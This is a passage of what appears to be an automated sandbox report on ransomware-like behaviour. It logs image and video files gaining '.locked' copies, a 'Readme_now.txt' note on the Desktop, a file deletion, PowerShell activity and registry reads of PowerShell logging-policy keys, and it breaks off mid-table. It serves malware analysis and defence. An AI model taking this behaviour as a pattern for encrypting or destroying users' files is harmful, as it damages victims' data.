2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif.locked | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\S-V0K7xKBR3hd1x.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\S-V0K7xKBR3hd1x.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs | type = file_attributes |
|
10 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos | type = file_attributes |
|
30 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\cBLR.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\cBLR.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4.locked | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | type = file_attributes |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
54 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 719 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | size = 4096, size_out = 2838 |
|
1 | |
| Delete | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3 | - |
|
1 | |
|
For performance reasons, the remaining 667 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (433)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | - |
|
